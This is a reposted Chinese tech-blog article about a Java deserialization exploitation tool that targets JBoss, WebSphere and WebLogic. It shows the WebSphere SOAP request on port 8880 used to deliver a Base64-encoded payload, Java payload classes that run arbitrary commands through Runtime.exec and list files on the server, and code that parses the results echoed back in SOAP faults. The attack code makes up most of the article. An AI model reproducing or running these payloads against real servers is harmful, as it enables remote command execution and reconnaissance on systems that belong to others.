转载

Java反序列化集成工具

0X00 概述

Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。

FreeBuf上已经公开了 JBoss反序列化执行命令 回显的工具,在本文中就不多做叙述了。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。

本工具暂时支持的功能:

1、本地命令执行并回显,无须加载外部jar包,支持纯内网环境检测。 2、支持JBoss、WebSphere和Weblogic的反序列化漏洞检测。 3、支持https数据传输。 4、支持文件目录列表。

0X01 WebSphere的反序列化漏洞利用过程

WebSphere的反序列化漏洞发生的位置在SOAP的通信端口8880,使用的通信协议是https,发送的数据是XML格式的数据。 

    <?xml version='1.0'encoding='UTF-8'?>     <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">     <SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0">     <LoginMethod>BasicAuth</LoginMethod>     </SOAP-ENV:Header>     <SOAP-ENV:Body>     <ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">     <objectname xsi:type="ns1:javax.management.ObjectName">Base64(payload)</objectname>     <attribute xsi:type="xsd:string">ringBufferSize</attribute>     </ns1:getAttribute>     </SOAP-ENV:Body>     </SOAP-ENV:Envelope>

将我们构造的执行命令的payload通过base64编码后放在objectname节点中,通过https发送到服务器端,服务器端调用相应的执行函数,将结果发送给客户端,同样的,返回的数据也是经过base64编码的。

WebSphere的Payload和JBoss的基本一致。如下是执行命令的payload。

    public RunCommand(String command) throws Exception     {             Process proc = Runtime.getRuntime().exec(command);             BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));             StringBuffer sb = new StringBuffer();             String line;             while ((line = br.readLine()) != null)             {                 sb.append(line).append("/n");             }             String result = "/r/n/r/n==========" + sb.toString() + "==========/r/n";             br.close();             Exception e=new Exception(result);             throw e;     }

将命令执行结果以字符隔开,这样在客户端获取数据后,可通过split、substring等方法对命令的执行结果进行解析。解析命令的源码如下: 

    public static String parseResult(String result)     {     String tmp=result.split("<faultstring>")[1];     String reString=tmp.split("</faultstring>")[0];     String resultTmp=new String(Base64.getDecoder().decode(reString));     int x1=resultTmp.indexOf("==========")+10;     int x2=resultTmp.lastIndexOf("==========")-1;     String returnValue="";     if(x1>=0&&x2>=0)     returnValue=resultTmp.substring(x1, x2).trim();     else     returnValue=resultTmp;     return returnValue;     }

0X02 文件列表读取

获取文件列表的功能是通过Java的listRoot和listFiles来实现的,获取文件和目录列表的过程和命令执行大概相同。在这我就简单的描述一下过程:如果传入方法的是一个空值,那么就通过Files.listRoot获取根目录或者驱动器列表,否则,传入的值是路径的话,就通过file.listFiles方法获取目录下的所有文件和目录,将获取到的目录名放到{}中,将文件名放在[]中,这样,就方便我们在程序中对获取到的数据进行解析。

获取目录的payload代码如下:

    public GetFileList(String fileName) throws Exception     {     StringBuilder sb=new StringBuilder();     String result=new String();     if(fileName.isEmpty())     {     File[] files=File.listRoots();     for(int i=0;i<files.length;i++)     {     sb.append(files[i].getAbsolutePath()).append(",");     }     result="{"+sb.toString().substring(0,sb.toString().length()-1)+"}";     }     else     {     File file=new File(fileName);     StringBuilder dirList=new StringBuilder();     StringBuilder fileList=new StringBuilder();     if(file.isDirectory())     {     File[] list=file.listFiles();     dirList.append("{");     fileList.append("[");     for(int i=0;i<list.length;i++)     {     if(list[i].isDirectory())     dirList.append(list[i].getAbsolutePath()).append(",");     else     fileList.append(list[i].getAbsolutePath()).append(",");     }     }     if(!dirList.toString().isEmpty())     sb.append(dirList.toString().substring(0,dirList.toString().length()-1)).append("}");     if(!fileList.toString().isEmpty())     sb.append(fileList.toString().substring(0,fileList.toString().length()-1)).append("]");     result=sb.toString();     }     result="/r/n/r/n==========/r/n"+result+"/r/n==========/r/n";     Exception e=new Exception(result);             throw e;     }

解析的时候,先将执行结果分离出来,再对结果base64解码,再进一步区分目录和文件,分别添加到界面的目录树中。

注:设计时为了美观,使用了JavaFX来设计界面,运行时需要JDK1.8环境。

程序运行效果如下:

Java反序列化集成工具

正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 Spring教程 Git教程 Java设计模式 Jenkins进阶系列 openfire参考指南 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 Hive教程 ANTLR教程 Ant教程 java实例教程 SpringCloud Elastic-Job-Lite XStream教程 深入浅出MyBatis Hazelcast教程 ibaties教程 SVN教程 rabittmq教程 Hadoop教程 solr教程 WebService CXF学习 springcloud-demo JPA教程 ActiveMQ中文指南 Java内存模型 java-demo dubbo教程 Linux入门视频教程
近期评论
  1. 1 Spring Cloud Circuit Breaker快速入门Demo
  2. 2 Spring Cloud Bus快速入门Demo
  3. 3 Spring Cloud Config快速入门Demo
  4. 4 Spring Cloud Function快速入门Demo
  5. 5 SSPanel-Uim搭建教程 2023年全新定制版主题-解决老版本命令失效问题
  6. 6 Spring Boot集成Milvus和deeplearning4j实现图搜图功能
  7. 7 Spring Boot集成Aviator实现参数校验
  8. 8 ACME自动申请免费的通配符https域名证书
  9. 9 wordpress 数据库和文件优化
  10. 10 CentOS安装Docker与Docker-Compose
网站信息
  • 文章总数:82,696 篇
  • 文件总数:284,257 个
  • 标签总数:2,380 个
  • 分类总数:84 个
  • 留言数量:2,560 条
  • 在线人数:616 人
  • 运行天数:4,392天
  • 最后更新:2024年11月05日20点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG